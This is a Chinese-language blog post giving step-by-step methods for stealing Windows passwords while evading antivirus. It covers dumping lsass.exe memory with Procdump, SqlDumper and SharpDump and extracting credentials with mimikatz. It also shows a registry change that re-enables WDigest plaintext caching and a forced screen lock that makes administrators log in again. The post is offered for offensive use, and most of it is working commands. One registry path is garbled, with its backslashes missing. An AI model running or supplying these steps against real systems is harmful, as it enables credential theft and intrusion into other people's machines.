抓Windows密码的几种方式

作者: Instu | 来源:发表于2019-08-14 23:54 被阅读92次

    目前大部分抓Windows密码的工具都会被杀软拦截,例如mimikatz,wce,pwdump等,下面介绍几种具有一定免杀效果的抓密码方式。

    一、Procdump

    Procdump是Windows工具包里的一款工具,由于有微软的官方签名,所以大部分杀软不会查杀。
    sysinternals工具包下载地址:
    https://docs.microsoft.com/zh-cn/sysinternals/downloads/

    1. 获取内存文件lsass.exe
    procdump64.exe -accepteula -ma lsass.exe lsass.dmp
    
    1. 将lsass.dmp下载到攻击者的电脑上
    2. 使用本地的mimikatz.exe读取lsass.dmp
    mimikatz.exe "sekurlsa::minidump lsass.dmp" "sekurlsa::logonPasswords full" exit
    
    image.png

    二、SqlDumper

    如果目标安装了mssql,可以通过sqldumper.exe来dump lsass进程,没安装也可以手动上传。
    sqldumper的默认路径:C:\Program Files\Microsoft SQL Server\110\Shared

    1. 先找到lsass.exe的进程id
    tasklist|findstr "lsass.exe"
    
    1. 导出dmp文件
    sqldumper.exe <pid> 0 0x01100
    
    1. 将导出的SQLDmpr0001.mdmp下载到攻击者的电脑上
    2. 使用本地的mimikatz.exe进行读取
     mimikatz.exe "sekurlsa::minidump SQLDmpr0001.mdmp" "sekurlsa::logonPasswords full" "exit"
    
    image.png

    三、SharpDump

    体积小巧(不到10KB),便于自己做免杀处理,下载地址:
    https://github.com/GhostPack/SharpDump

    1. 首先需要使用vs编译成exe文件
    image.png
    1. 把lsass.exe进程数据导出来
    C:\Users\Administrator\Desktop>SharpDump.exe
    
    image.png
    1. dump的文件是 bin 后缀,拖到本地机器上以后,先重命名为 zip 后缀,然后解压
    2. 使用本地的mimikatz进行读取
    mimikatz.exe "sekurlsa::minidump debug516" "sekurlsa::logonPasswords full" "exit"
    
    image.png

    四、Win10及2012以后的系统,如何抓取明文?

    当系统为win10或2012以上时,默认在Wdigest内存中禁止保存明文密码(hash可以抓到),可以通过修改注册表的方式进行绕过。

    1. 修改注册表
    打开:
    reg add HKLM\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest /v UseLogonCredential /t REG_DWORD /d 1 /f
    关闭:
    reg add HKLMSYSTEMCurrentControlSetControlSecurityProvidersWDigest /v UseLogonCredential /t REG_DWORD /d 0 /f
    
    1. 开启 Wdigest Auth 后,需要重新登录才能抓到明文,可以使用强制锁屏的方式,让管理员重新登录。
    rundll32 user32.dll,LockWorkStation
    
    1. 登录后,再使用Procdump获取内存lsass.exe中的信息,就可以得到明文了。

    说明:如果杀毒软件有dump内存文件保护,则以上方式无法免杀。

    相关文章

      网友评论

        本文标题:抓Windows密码的几种方式

        本文链接:https://www.haomeiwen.com/subject/zvaujctx.html